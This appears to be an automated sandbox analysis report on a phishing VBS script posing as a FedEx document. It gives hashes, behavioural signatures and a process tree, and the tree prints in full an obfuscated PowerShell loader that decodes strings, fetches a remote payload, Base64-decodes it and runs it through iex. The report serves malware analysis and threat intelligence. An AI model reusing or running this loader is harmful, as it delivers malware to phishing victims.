Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
22/04/2024, 13:21
Static task
static1
Behavioral task
behavioral1
Sample
CR-FEDEX_TN-775537409198_Doc.vbs
Resource
win7-20240215-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
CR-FEDEX_TN-775537409198_Doc.vbs
Resource
win10v2004-20240412-en
7 signatures
150 seconds
General
-
Target
CR-FEDEX_TN-775537409198_Doc.vbs
-
Size
58KB
-
MD5
7adbafc63cc01ebeae27fd4074430da1
-
SHA1
9868805bad5478b2400d637b268f1aebea0b6c67
-
SHA256
fb712dfc934fe7630f1e6e2b2bd79be641de26accc34fda08c3f6e269d40c9b4
-
SHA512
a5623d714f6b49857bbb19a0c9727e63f4259d234d4226100954bba94eac7f4e0aa5b5510cc94d0629c78ae35ef28c19e8ba46caf490190f28a9136af578ebe0
-
SSDEEP
768:82p/fwNaKj7gHrI0i3wPDPM+A0s2hyOX0Q4afFysrmUYAYB8nq7rIF9NISEqQEs2:7ukLI1gPDPTxyk0MfFCNqnASLQE66
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 34 IoCs
flow pid Process 3 1888 WScript.exe 8 2432 powershell.exe 9 2432 powershell.exe 10 2432 powershell.exe 11 2432 powershell.exe 12 2432 powershell.exe 13 2432 powershell.exe 14 2432 powershell.exe 15 2432 powershell.exe 16 2432 powershell.exe 17 2432 powershell.exe 18 2432 powershell.exe 19 2432 powershell.exe 20 2432 powershell.exe 21 2432 powershell.exe 22 2432 powershell.exe 23 2432 powershell.exe 24 2432 powershell.exe 25 2432 powershell.exe 26 2432 powershell.exe 27 2432 powershell.exe 28 2432 powershell.exe 29 2432 powershell.exe 30 2432 powershell.exe 31 2432 powershell.exe 32 2432 powershell.exe 33 2432 powershell.exe 34 2432 powershell.exe 35 2432 powershell.exe 36 2432 powershell.exe 37 2432 powershell.exe 38 2432 powershell.exe 39 2432 powershell.exe 40 2432 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2540 ping.exe 2520 ping.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2432 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1888 wrote to memory of 2540 1888 WScript.exe 28 PID 1888 wrote to memory of 2540 1888 WScript.exe 28 PID 1888 wrote to memory of 2540 1888 WScript.exe 28 PID 1888 wrote to memory of 2520 1888 WScript.exe 30 PID 1888 wrote to memory of 2520 1888 WScript.exe 30 PID 1888 wrote to memory of 2520 1888 WScript.exe 30 PID 1888 wrote to memory of 2704 1888 WScript.exe 32 PID 1888 wrote to memory of 2704 1888 WScript.exe 32 PID 1888 wrote to memory of 2704 1888 WScript.exe 32 PID 1888 wrote to memory of 2432 1888 WScript.exe 34 PID 1888 wrote to memory of 2432 1888 WScript.exe 34 PID 1888 wrote to memory of 2432 1888 WScript.exe 34 PID 2432 wrote to memory of 2412 2432 powershell.exe 36 PID 2432 wrote to memory of 2412 2432 powershell.exe 36 PID 2432 wrote to memory of 2412 2432 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CR-FEDEX_TN-775537409198_Doc.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\ping.exeping google.com -n 12⤵
- Runs ping.exe
PID:2540
-
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- Runs ping.exe
PID:2520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHftesoKasseu eromsWalki],hoto= Swiz$ Par F ejrrDefiniEl.cte SnuprNr.esiComba ');$Klavringernes=Tabellariske ',opias VandoeyebalFelteoInd.vsa delpOmdigiSu epl,rbejsPipp .La.erD,nfrioOpjuswSalpenMesual Deoro teskaDipoldSpillFPacifiFiskelrockseSkils( Fej.$P,abeVCarlooAntiklKonfio Bundw Gul 1Bagbo5A yno9 Logi,Unslu$VigtiA Tegmnol.nek raspeUnautrAbrentBorlao ablivafstieEnsur)Sec n ';$Klavringernes=$Rossellinis[1]+$Klavringernes;$Ankertove=$Rossellinis[0];Gdedes (Tabellariske 'S.ffg$S,bbagRe.nflUbefooDys.nbAner a Carplr,tif:,obisF afizr OrphuInt,rg UnbrtTeknobLnsl.aPlainrFrasigFastgrPaickeUnspurRetra=M seg(SukkuT,roomefjerrsResentMakul-AliauP AtteaSpindtOverfhVandf exa i$Sk,ttA commnVe.nikUn,ove Au.frAbbretVin,ioDe itv LinceA.skr) Rett ');while (!$Frugtbargrer) {Gdedes (Tabellariske 'Jerng$ MerrgAarsrlOptegoHamshb denaaBard lUstem:OvergS I,ery UsannsnekktInhumhInd.aeEngh.t I raiFeriezCirkueV,ema=Fores$TeglbtUnderrDiagouKup feInves ') ;Gdedes $Klavringernes;Gdedes (Tabellariske 'CyberSEnesttSalutaOpe,sr Naalt Quee-EkstrSRosellDemi,eForsteVariop refa Fluk4Gonyd ');Gdedes (Tabellariske 'Deta $RejecgR tsblZonolo .lotb misua MisllB,lle:KrigsFS,iborKeratu ,ansgS,mittSpr tb CoraaSpondrforsvgHellmr No.ceSk,anrSa,dw=Fulds( RegeT Las,ePol,asIsomytGraat- DobsPPiacuaTv.ngtP inthGrote Reass$Ya,ilADispenDep.skFjrteeKavalrNeo.etRumbloKampkv.esoneOverh)Freud ') ;Gdedes (Tabellariske 'Caddi$,himagTold lStandoAdoxybHiks aGeotelT,lea:ReaccTSuperrDucesu SebomSundsbRoityuE,uislLapwil alle=Fejlr$TonyagHollylPoly.oSerapbB,byeaR,drilVasew:PulteRHjertoSuppocUsknsk HypoefranatPseuds onseo in,vnNcr.adVal reBrend+Fissi+Tekst%Brkke$Saltwe avekk NonisAsta p exadeCruderConcot M sal Footi MononEdderi Til eAnmelnPocke.fa.tocLimsioHappeucoatcnVi,out ,oub ') ;$Volow159=$ekspertlinien[$Trumbull];}Gdedes (Tabellariske ' Indk$mar,ig AmpllSadd,o H.libpolluatv,salBag p: Galls aneltsejr uFribidBecchi B.mbeSupersDicertslidba Ph.trS.vmut BarkePedatnNotatsPenep .aban= Sch, AbonnG kloveOccastFunki-benigCFaglro Ma ynslogetTrummeRhysln BucktS olo Pha c$ aloAHun anU,dsikVarineGloeorFranctArtero H anvRenoveBibli ');Gdedes (Tabellariske ' Lupo$LegisgGalenlReempoUnderbCoccaaKillil Apo.:v.gtiMSoy saRenovrUndergPr.enr RepriH.ksetForldtprei, Brdgr=Sc pi Styr[ IgniSS,ratyJibeds Rep t Autoe aarem Dall.StorsCPegleoSupranFlokuv DefleFossirApol.tAzofo]hydro:Unhog:Ro.usFRe,ssrnonaso dekomam,noBPreseaSavvrs Ungre M ri6,iled4TetroS.ardatFoyairW.sleiRowlonMaringIn.ox(Indha$P.ntssOpvejtIntrauSt ttd.eliei SmaseP otosPrintt ,nasaLa gtrIdriftSaftfe,allanc.ntas,usto) eres ');Gdedes (Tabellariske 'Hidse$ o cug Predl ErucoLinchbGam eaIguanl Gg,e:B.gmaTlambar MailaMa.chpIs,pepValene Skama.ngdof t,sesOrdinaAnt,otskratsFlytteApayanAller2 S,hi8Undut S,egl= Poli Jakke[guldsSKronry A.tas ImpotCry.te,evalmSkrle.UglisT Wan.eSexlexSurtat Kat,.ElasmELandbninwo,cGrinco Upprd.empeiZelann eukigSail,]Fjort:Tilbu: Du.gA AngkSAbbreCForseIholodIT,akt. diveGSystee,rilltTsarrSBispitDiskbrProngiHy ern bedrgMonos( Paed$KnbesMsparkaBjr erAllesg,egahrPa.kyi MedltTri.ytTroph) Sain ');Gdedes (Tabellariske 'S.abi$ chamg,nasslEclogo.dlbsbGeneraMonotl Lage:Re.urH ZoneeOver.lBarnabDodonrselvseKorpodChipbe dados Sklm=Unpor$BolsmTUnoxirGo rmaocca pIdoispKiddyeKlammaTredrfSacrasRe utabyraatFeyess SledeAdresn tlnd2cocks8Penny.DigitsLukrzuShowgbUva,osSeasitSpedirStilliSlavinPhotag .alc(Death3Thear2Allow9Bekko6 Afte9 Apot6Rem,u, Sig.2 Fdev9 extr0Kendt2Skrig3 For.) Frem ');Gdedes $Helbredes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $"3⤵PID:2412
-
-